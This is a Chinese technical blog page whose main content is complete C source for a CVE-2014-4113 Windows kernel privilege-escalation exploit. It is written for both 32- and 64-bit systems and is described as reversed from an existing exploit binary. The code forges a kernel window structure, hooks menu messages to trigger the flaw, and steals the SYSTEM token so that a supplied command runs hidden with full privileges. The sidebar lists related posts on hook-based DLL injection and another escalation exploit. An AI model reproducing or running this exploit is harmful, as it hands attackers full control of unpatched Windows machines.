4113_exp_code

最新推荐文章于 2019-06-17 16:21:37 发布
最新推荐文章于 2019-06-17 16:21:37 发布
阅读量836 收藏
点赞数
分类专栏: 漏洞挖掘 
//
// Cve-2014-4113 'win32/win64 exp C code' reversed from 'exe exp'
// 2014-11-10
// Compiled pass on VS2010
//

#include <windows.h>
#include <stdio.h>

#pragma comment(lib, "user32.lib")


/

 
typedef struct _SYSTEM_MODULE_INFORMATION_ENTRY {
	HANDLE Section;
	PVOID  MappedBase;
	PVOID  Base;
	ULONG  Size;
	ULONG  Flags;
	USHORT LoadOrderIndex;
	USHORT InitOrderIndex;
	USHORT LoadCount;
	USHORT PathLength;
	CHAR   ImageName[256];
} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY;

typedef struct _SYSTEM_MODULE_INFORMATION {
	ULONG Count;
	SYSTEM_MODULE_INFORMATION_ENTRY Module[1];
} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;

 



typedef LPVOID PEPROCESS ;
typedef LONG   (__stdcall *PZWQUERYSYSTENINFORMATION)(DWORD, PVOID, ULONG, PDWORD) ;
typedef LONG   (__stdcall *PZWALLOCATEVIRTUALMEMORY) (HANDLE, PVOID, ULONG, PULONG, 
                                                      ULONG, ULONG) ;
typedef LONG   (__stdcall *PLOOKUPPROCESSBYID)(HANDLE, PEPROCESS *) ;
typedef	LPVOID (__stdcall *PTICURRENT)() ;
  

PZWQUERYSYSTENINFORMATION fpQuerySysInfo       = NULL ;
PZWALLOCATEVIRTUALMEMORY  fpAllocateVirtualMem = NULL ;
PLOOKUPPROCESSBYID		  fpLookupProcessById  = NULL ;

DWORD dwTokenOffset = 0 ;
DWORD gFlag1  = 0 ;
DWORD gFlag2  = 0 ;
DWORD gFlag3  = 0 ;
 
WNDPROC lpPrevWndFunc   = NULL ;

DWORD dwCurProcessId    = 0  ;
DWORD dwSystemProcessId = 0  ;

//

void PrintMsg(const char *formatString, ...)
{
  va_list  va ; 
  va_start(va, formatString) ;
  vprintf(formatString, va) ;
  ExitProcess(0);
}

#ifdef _WIN64

DWORD InitTokenOffset()
{
	DWORD result;  
	OSVERSIONINFO VerInfo;  

	VerInfo.dwOSVersionInfoSize = sizeof(OSVERSIONINFO) ;
	if (!GetVersionExA(&VerInfo))
	{
		printf("FAIL : GetVersion\n") ;
		ExitProcess(0) ;
  	}
  	
	result = 1;
	if (VerInfo.dwMajorVersion == 5)
	{
		dwTokenOffset = 0x160 ;
		gFlag2 = 1 ;
	}
	else if (VerInfo.dwMajorVersion == 6)
	{
		switch(VerInfo.dwMinorVersion)
		{
			case 0:
			{
				dwTokenOffset = 0x168 ;
				break ;
			}
			default:
			{
				dwTokenOffset = 0x208 ;
			}
		}
	}
	else
	{
		result = 0 ;
	}
	
	if(result == 0)
	{
		printf("FAIL : InitTokenOffset\n") ;
		ExitProcess(0) ;
	}
	
	return result;
}

#else

DWORD InitTokenOffset()
{
	DWORD result;  
	OSVERSIONINFO VerInfo;  

	VerInfo.dwOSVersionInfoSize = sizeof(OSVERSIONINFO) ;
	if (!GetVersionExA(&VerInfo))
	{
		printf("FAIL : GetVersion\n") ;
		ExitProcess(0) ;
  	}
  	
	result = 1;
	if (VerInfo.dwMajorVersion == 5)
	{
		switch(VerInfo.dwMinorVersion)
		{
			case 0:
			{
				dwTokenOffset = 0x12C ;
				break ;
			}
			case 1:
			{
				dwTokenOffset = 0x0C8 ;
				break ;
			}
			case 2:
			{
				dwTokenOffset = 0x0D8 ;
				break ;
			}
			default:
			{
				dwTokenOffset = 0x0C8 ;
			}
		}
	}
	else if (VerInfo.dwMajorVersion == 6)
	{
		switch(VerInfo.dwMinorVersion)
		{
			case 0:
			{
				dwTokenOffset = 0x0E0 ;
				break ;
			}
			case 1:
			{
				dwTokenOffset = 0x0F8 ;
				break ;
			}
			default:
			{
				result = 0 ;
			}
		}
	}
	else
	{
		result = 0 ;
	}
	
	if(result == 0)
	{
		printf("FAIL : InitTokenOffset\n") ;
		ExitProcess(0) ;
	}
	
	return result;
}
#endif


HMODULE GetKrnlNtBase(char *szNtName)
{	
	char  Buffer[0xA]  ;
	DWORD dwRetLength ;
	
	DWORD SystemModuleInfo = 0x0B ;
	if(0xC0000004 != fpQuerySysInfo(SystemModuleInfo, Buffer, 0x0A, &dwRetLength))
	{
		printf("FAILED \n") ;
		ExitProcess(0) ;
	}
	
	PSYSTEM_MODULE_INFORMATION pBuf = (PSYSTEM_MODULE_INFORMATION)LocalAlloc(LMEM_ZEROINIT, 
	                                                                         dwRetLength) ;
	
	if(0 != fpQuerySysInfo(SystemModuleInfo, pBuf, dwRetLength, &dwRetLength))
	{
		printf("FAILED \n") ;
		ExitProcess(0) ;
	}	
 
 	PSYSTEM_MODULE_INFORMATION_ENTRY pModEntry = pBuf->Module ;
 	HMODULE hModuleBase = NULL ;
 	
	for(ULONG i = 0 ; i < pBuf->Count ; i++ )
  	{
  		//ASCII "\SystemRoot\system32\ntkrnlpa.exe"
	    if(strstr(pModEntry->ImageName, "nt") && strstr(pModEntry->ImageName, "exe"))
	    {
		    strcpy_s(szNtName, MAX_PATH, (char*)((ULONG_PTR)pModEntry->ImageName + pModEntry->PathLength)) ;
		    ///strncpy(szNtName, (char*)((ULONG_PTR)pModEntry->ImageName + pModEntry->PathLength), MAX_PATH) ;
		    hModuleBase = (HMODULE)(pModEntry->Base) ;
		    break ;
	    }
	    pModEntry++ ;
  	}
 
 	if(hModuleBase == NULL)
 	{
 		printf("FAIL : Get Ntoskrnl Base\n") ;
 		ExitProcess(0) ;
 	}
 	
  	LocalFree(pBuf);
  	return hModuleBase;
}


DWORD InitExpVars()
{
	HMODULE hNtdll ;
  
	hNtdll = LoadLibraryA("ntdll.dll");
 	
 	if(hNtdll == NULL)
 	{
 		printf("FAIL : hNtdll == NULL \n") ;
 		ExitProcess(0) ;
 	}
	
	fpQuerySysInfo = (PZWQUERYSYSTENINFORMATION)GetProcAddress(hNtdll, "ZwQuerySystemInformation");
	fpAllocateVirtualMem = (PZWALLOCATEVIRTUALMEMORY)GetProcAddress(hNtdll, "ZwAllocateVirtualMemory");
  
  	if(!fpQuerySysInfo || !fpAllocateVirtualMem)
  	{
  		printf("FAIL : GetProcAddress ZwQuerySystemInformation or ZwAllocateVirtualMemory\n") ;
  		ExitProcess(0) ;
  	}
  	
	char NtKernelName[MAX_PATH] ;
  
	HMODULE hKrnlNtBase = GetKrnlNtBase(NtKernelName);
	HMODULE hUserNtBase = LoadLibraryA(NtKernelName);
 
	fpLookupProcessById = (PLOOKUPPROCESSBYID)((ULONG_PTR)GetProcAddress(hUserNtBase, \
  						  "PsLookupProcessByProcessId") - \
						  (ULONG_PTR)hUserNtBase + \
						  (ULONG_PTR)hKrnlNtBase ) ;

	dwCurProcessId      = GetCurrentProcessId() ;
	dwSystemProcessId   = 4 ;
  
	FreeLibrary(hUserNtBase);
  	
	return 1;
}


LPVOID CallPtiCurrent()  
{
	LPVOID  result = NULL ;
  	HMODULE hUser32 = NULL ;
  	PVOID   dstFunc ;
  	
	hUser32 = LoadLibraryA("user32.dll");
 
	if(hUser32)
	{
	    dstFunc = (PVOID)GetProcAddress(hUser32, "AnimateWindow");
	    if(gFlag2) // gFlag2 always zero in win32 exp
	    {
	      dstFunc = (PVOID)GetProcAddress(hUser32, "CreateSystemThreads");
	    }
	    if(dstFunc && *(WORD *)hUser32 == 0x5A4D )
	    {
	      IMAGE_NT_HEADERS *pPEHead = (IMAGE_NT_HEADERS *)((ULONG_PTR)hUser32 + \
		                              *(DWORD*)((ULONG_PTR)hUser32+0x3C)) ;
#ifdef _WIN64
	      ULONG_PTR ImageBase  = pPEHead->OptionalHeader.ImageBase;
	      ULONG_PTR ImageBound = pPEHead->OptionalHeader.SizeOfImage + ImageBase;
#else
	      DWORD ImageBase  = pPEHead->OptionalHeader.ImageBase;
	      DWORD ImageBound = pPEHead->OptionalHeader.SizeOfImage + ImageBase;
#endif
	      PBYTE p = (PBYTE)dstFunc ;
	      
	      // search function 'PtiCurrent' address in code segment
	      for(DWORD i = 0 ; i < 70 ; i++)
	      {
		      	if((*p == 0xE8 && gFlag2 == 0) || (*p == 0xE9 && gFlag2))
		      	{
		      			if(p < (PBYTE)ImageBase || p > (PBYTE)ImageBound) break ;
		      			
		      			PTICURRENT fpPtiCurrent ; 
						// jmp offset is 4 bytes and can be negative 
		      			fpPtiCurrent = (PTICURRENT)(*(INT *)(p+1) + (LONG_PTR)p + 5) ; 
		      			
		      			result = fpPtiCurrent() ; // result -> tagTHREADINFO 
		      			
		      			break ;
		      	}
		      	p++ ;
	      }
	    }
		FreeLibrary(hUser32);
	}
	return result ;
}


// This is our fake 'WndProc' used to exploit
LRESULT CALLBACK ShellCode(HWND hWnd, UINT uMsg, WPARAM wParam, LPARAM lParam)
{
	PEPROCESS pCur, pSys ;
	fpLookupProcessById((HANDLE)dwCurProcessId,    &pCur);
	fpLookupProcessById((HANDLE)dwSystemProcessId, &pSys);
#ifdef _WIN64
	*(PVOID *)((ULONG_PTR)pCur + dwTokenOffset) = *(PVOID *)((ULONG_PTR)pSys + dwTokenOffset);
#else
	*(PVOID *)((DWORD)pCur + dwTokenOffset) = *(PVOID *)((DWORD)pSys + dwTokenOffset);
#endif
	return  0 ;
}


DWORD  InitExploitMem(LPVOID *pAllocAddr)  
{
	LPVOID pThreadInfo = CallPtiCurrent() ;

#ifdef _WIN64
	*(DWORD*)pAllocAddr = 0xFFFFFFFB ; 
#else
	*(DWORD*)pAllocAddr = 1 ;
#endif

	ULONG uRegionSize  = 0x2000 ;
  
	LONG iret = fpAllocateVirtualMem(  GetCurrentProcess(), 
  									   pAllocAddr, 0, &uRegionSize,  
  									   MEM_COMMIT | MEM_RESERVE | MEM_TOP_DOWN, 
						  			   PAGE_EXECUTE_READWRITE ) ;
	if(iret)
	{
		printf("Allocate Mem Failed \n") ;
		ExitProcess(0) ;
	}

	// fill fake tagWND struct
#ifdef _WIN64
	*(PVOID *)(0x10000000B) = pThreadInfo ;
	*(BYTE *) (0x100000025) = 4 ;                 // 0x100000025-0xFFFFFFFB=0x2A, bServerSideWindowProc
	*(PVOID *)(0x10000008B) = (PVOID)ShellCode ;  // 0x10000008B-0xFFFFFFFB=0x90, lpfnWndProc
#else
	*(PVOID*)(0x3)  =  pThreadInfo ;              // 3-(-5)    = 8   
	*(BYTE*) (0x11) = (BYTE)4 ;                   // 17-(-5)   = 0x16, bServerSideWindowProc 
	*(PVOID*)(0x5B) = (PVOID)ShellCode ;          // 0x5B-(-5) = 0x60, lpfnWndProc
#endif  

	return 1;
}


LRESULT CALLBACK MyWndProc(HWND hWnd, UINT uMsg, WPARAM wParam, LPARAM lParam)
{
	if(uMsg == WM_ENTERIDLE) // 0x121
	{
		if (gFlag1 != 1)
		{
			gFlag1 = 1;
			PostMessageA(hWnd, WM_KEYDOWN, 0x28, 0) ;  
			PostMessageA(hWnd, WM_KEYDOWN, 0x27, 0) ; 
			PostMessageA(hWnd, WM_LBUTTONDOWN, 0x00, 0) ;  
		}  
	}
	return DefWindowProcA(hWnd, uMsg, wParam, lParam) ;
}


HMENU InitPopupMenu() 
{
	MENUITEMINFO Item1,  Item2 ;
	HMENU        hMenu1, hMenu2 ;
	
	memset(&Item1, 0, sizeof(Item1));
	memset(&Item2, 0, sizeof(Item2));

	hMenu1 = CreatePopupMenu();
	if(hMenu1 == NULL) return 0 ;
	
 	Item1.cbSize = sizeof(Item1) ;
    Item1.fMask  = MIIM_STRING ; // Retrieves or sets the dwTypeData member.
 	if(FALSE == InsertMenuItemA(hMenu1, 0, TRUE, &Item1))
 	{
 		DestroyMenu(hMenu1) ;
	 	return NULL ; 	
 	}
	
	hMenu2 = CreatePopupMenu() ;
	if(hMenu2 == NULL) return NULL ;
  
	static char szMenuText[2] = " " ;

	Item2.fMask      = MIIM_STRING | MIIM_SUBMENU ;
	Item2.dwTypeData = szMenuText ;
	Item2.cch        = 1 ;             // length of szMenuText
	Item2.hSubMenu   = hMenu1 ;
	Item2.cbSize     = sizeof(Item2) ;
	
 	if(FALSE == InsertMenuItemA(hMenu2, 0, TRUE, &Item2))
 	{
 		printf("InsertMenuItem FAIL [%d] !\n", GetLastError()) ;
 		DestroyMenu(hMenu1) ;
 		DestroyMenu(hMenu2) ;
	 	return NULL  ; 	
 	}
 	return hMenu2 ;
}


LRESULT CALLBACK NewWndProc(HWND hWnd, UINT uMsg, WPARAM wParam, LPARAM lParam)
{
	if(uMsg != 0x1EB)
	{
		return CallWindowProcA(lpPrevWndFunc, hWnd, uMsg, wParam, lParam) ;
	}
	EndMenu() ;
	return (DWORD)(-5) ; // DWORD 
}

 
LRESULT CALLBACK WndProcHook(int nCode, WPARAM wParam, LPARAM lParam)
{
	CWPSTRUCT *pWndProcArgs = (CWPSTRUCT*)lParam ;
	
	if(pWndProcArgs->message == 0x1EB) // MN_FINDMENUWINDOWFROMPODWORD
 	{
  		if(!gFlag3)
  		{
			gFlag3 = 1 ;
			if(UnhookWindowsHook(WH_CALLWNDPROC, WndProcHook))
			{
#ifdef _WIN64
				lpPrevWndFunc = (WNDPROC)SetWindowLongPtrA( pWndProcArgs->hwnd, 
				                                            GWLP_WNDPROC, 
														    (LONG_PTR)NewWndProc ) ; // LONG_PTR
#else

				lpPrevWndFunc = (WNDPROC)SetWindowLongA( pWndProcArgs->hwnd, 
				                                         GWL_WNDPROC, 
														 (LONG)NewWndProc ) ;        // LONG
#endif
			}
		}
	} 
	return CallNextHookEx(NULL, nCode, wParam, lParam);	
}


DWORD WINAPI ThreadProc(LPVOID lParam) 
{
	WNDCLASS    wc ;
	SYSTEM_INFO SystemInfo ;
	HWND        hWnd ;
  	DWORD       result = 0 ;
  	LPVOID 		pAllocAddr ;
  	
	memset(&SystemInfo, 0, sizeof(SystemInfo));
	memset(&wc, 0, sizeof(wc));
  
	wc.lpfnWndProc   = MyWndProc ;  
	wc.lpszClassName = "woqunimalegebi" ;
  
	GetNativeSystemInfo(&SystemInfo);

#ifdef _WIN64
	if(SystemInfo.dwOemId == PROCESSOR_ARCHITECTURE_INTEL) 
	{
		printf("System Is Not Win64\n") ;
		ExitProcess(0) ;
	}
#else
	if(SystemInfo.dwOemId == PROCESSOR_ARCHITECTURE_AMD64) 
	{
		printf("System Is Not Win32\n") ;
		ExitProcess(0) ;
	}
#endif


	RegisterClassA(&wc) ;
	hWnd = CreateWindowExA(0, wc.lpszClassName, 0, 0, -1, -1, 0, 0, 0, 0, 0, 0) ;
	if(hWnd == NULL) return 0 ;
 
	InitExploitMem(&pAllocAddr) ;
	
	HMENU hMenu2 = InitPopupMenu();
	
	if(hMenu2)
	{
		DWORD dwThreadId = GetCurrentThreadId();
		if(SetWindowsHookExA(WH_CALLWNDPROC,  WndProcHook, 0, dwThreadId))
		{
			// trigger
#ifdef _WIN64
			if(TrackPopupMenu(hMenu2, 0, 0xFFFFD8F0, 0xFFFFD8F0, 0, hWnd, 0))
#else
			if(TrackPopupMenu(hMenu2, 0, -10000, -10000, 0, hWnd, 0))
#endif
			{
				PostMessageA(hWnd, 0, 0, 0);
				result = 1;
			}
		} 	
	}
 
	DestroyWindow(hWnd) ;
	if (hMenu2)
	{
		DestroyMenu(hMenu2);
	}
	UnhookWindowsHook(WH_CALLWNDPROC, WndProcHook);
	VirtualFree(pAllocAddr, 0, MEM_RELEASE);
	return result;
}


DWORD main(DWORD argc, char *argv[])
{
 	InitTokenOffset() ;

	InitExpVars() ;
	
  	HANDLE hThread = CreateThread(0, 0, (LPTHREAD_START_ROUTINE)ThreadProc, 0, 0, 0);
 
	if(WaitForSingleObject(hThread, 300000))
	{
    	TerminateThread(hThread, 0);
    	PrintMsg("FAIL [%d]\n", GetLastError()) ; 
  	}	
  	
	if(argv[1])
  	{
  		STARTUPINFO 	    StartupInfo ;
  		PROCESS_INFORMATION ProcessInfo ;
  		
		memset(&StartupInfo, 0, sizeof(StartupInfo)) ;
		memset(&ProcessInfo, 0, sizeof(ProcessInfo)) ;
    
		StartupInfo.cb = sizeof(STARTUPINFO) ;
		StartupInfo.wShowWindow = SW_HIDE ;
		StartupInfo.dwFlags     = STARTF_USESHOWWINDOW ;
	    CreateProcessA(0, argv[1], 0, 0, 0, 0, 0, 0, &StartupInfo, &ProcessInfo) ;
		WaitForSingleObject(ProcessInfo.hProcess, 60000) ;
		CloseHandle(ProcessInfo.hProcess) ;
		CloseHandle(ProcessInfo.hThread) ;
	}
	return 0 ;
}

寒江雪语
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
expcodes:经验代码库(索引目录)
05-30
expcodes  经验代码库 一个代码就是一个脚印,这些脚印就是寻找过程中留下的人生 简介 此代码仓库本质上是由多个有代表性的子项目整合而成的超级集索引,这里记录了我自学习编程以来所学所做的冰山一角。 相关的子项目代码目前以 C/C++、Java、Python 为主。涉及到的领域谈不上包罗万象,但毕竟是我多年来点滴积累的成果,而且大多都通过了生产环境的考验。 承诺不会放弃更新这个仓库,所以包含的子项目必定会越来越多。 但是如果某些子项目已经足够成熟,会将其抽离成独立项目,以便更好地开源共享。 环境 项目相关 经验库导航页 : 软件授权插件 : 自动升级插件 : 环境包下载页 : 核心子项目(部分项目涉敏已私有化) [经验构件库(Java版)] : 作为此仓库多个Java项目的基础功能组件包被使用,相关API详见: account-mgr [帐密管理工具] : 轻松管理大量个人帐密信息(
SetWindowsHookEx详解
wangkuiyun的专栏
11-22 1640
SetWindowsHookEx详解 (2011-03-21 17:56:28) 转载▼ 标签: 杂谈   SetWindowsHookEx详解 SetWindowsHookEx详解 2010-06-17 18:21 函数功能:该函数将一个应用程序定义的挂钩处理过程安装到挂钩链中去,您可以通过安装挂钩处理过程来对系统
通过安装WH_CALLWNDPROC全局钩子将DLL注入所有进行窗口过程的进程
05-25 8162
// HookDll.cpp : 定义 DLL 应用程序的导出函数。 // #include "stdafx.h" #include static HHOOK hHook=NULL; HINSTANCE hInstance; //钩子函数所在模块的句柄 BOOL APIENTRY DllMain( HANDLE hModule, DWORD ul_reason_for_c
hardware_exp_code
02-22
hardware_exp_code
lyaprosen.rar_The First_exp
07-14
In this case the code will use autocorrelation up to orders 10 to select proper embedding lag(tau). The proper lag is the lag before of first decline of autocorrelation value below exp(-1)=0....
regexp-macro-assembler-ia32.rar_exp linux
09-22
Reg Exp Macro Assembler IA32 for Linux Source Code.
LLVM_exp13c_HI_IR2SourceCode.7z
12-04
LLVM_exp13c_HI_IR2SourceCode.7z
MSP_EXP430F5529_LAB_CODE
08-13
MSP-EXP430F5529 教学光盘里包含的例程
Shellcode和Payload入门101-超详细源码和注释以及Hex文本
qq327332的博客
11-15 1604
ShellCode: PayLoad:
渗透中POC、EXP、Payload与Shellcode的区别
热门推荐
浅浅的博客
06-17 3万+
1. POC、EXP、Payload与Shellcode POC:全称 ' Proof of Concept ',中文 ' 概念验证 ' ,常指一段漏洞证明的代码。 EXP:全称 ' Exploit ',中文 ' 利用 ',指利用系统漏洞进行攻击的动作。 Payload:中文 ' 有效载荷 ',指成功exploit之后,真正在目标系统执行的代码或指令。 Shellcode:简单翻译 ' ...
哥伦布编码:Exp-Golomb code
abamon的专栏
05-22 5600
最近接触到两种编码方式:   exp-golomb code 指数哥伦布编码 是一种压缩编码算法(视频编码中有用到这个了,h264,avs) 原理举例如下:          K阶哥伦布码由如下步骤生成: a、  将数字以二进制的形式表达,去掉最低的K个bit之后+1; b、  计算留下的bit数,讲此数减1,即需要在数字前添加的0的数目; c、  将a中去掉的K bit补回至最低
EPATHOBJ 提权源码
yy405145590的专栏
06-05 1799
#include #include #include #include //#include #pragma comment(lib, "gdi32") #pragma comment(lib, "kernel32") #pragma comment(lib, "user32") #define MAX_POLYPOINTS (8192 * 3) #define MAX_REGION
WH_CALLWNDPROC
weixin_30463341的博客
05-28 726
WH_CALLWNDPROC钩子监视SendMessage消息的传递,不管是系统内部调用的SendMessage()函数还是用户进程中调用的SendMessage()函数。 SendMessage()把消息直接交给窗口过程WndProc()来处理,WndProc()处理完消息后SendMessage()函数才返回(return resultValue;). 如...
注入(4)--消息钩子注入(SetWindowsHookEX)
weixin_34160277的博客
10-02 1920
SetWindowsHookEx函数是微软提供给程序开发人员进行消息拦截的一个API。不过,他的功能不仅可以用作消息拦截,还可以进行DLL注入。 SetWindowsHookEx原型声明如下: WINUSERAPI HHOOK WINAPI SetWindowsHookExW( _In_ int idHook, _In_ HOOKPROC lpfn, _I...
ieo_ae_10000.source_exp_employee_repayment_line ieo_ae_10000.source_exp_loan_apply_head ieo_ae_10000.source_exp_employee_repayment_header三表关联起来 相同的条件DOCUMENT_NUM=‘EC03INIT000294’ REF_DOCUMENT_NUM IN COMPANY_GROUP_CODE OU_CODE
最新发布
07-08
您可以使用以下SQL查询将三个表进行关联: ...这将返回具有相同DOCUMENT_NUM('EC03INIT000294')和REF_DOCUMENT_NUM的记录,并且满足相同的COMPANY_GROUP_CODE和OU_CODE条件的记录。您可以根据需要调整查询条件。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值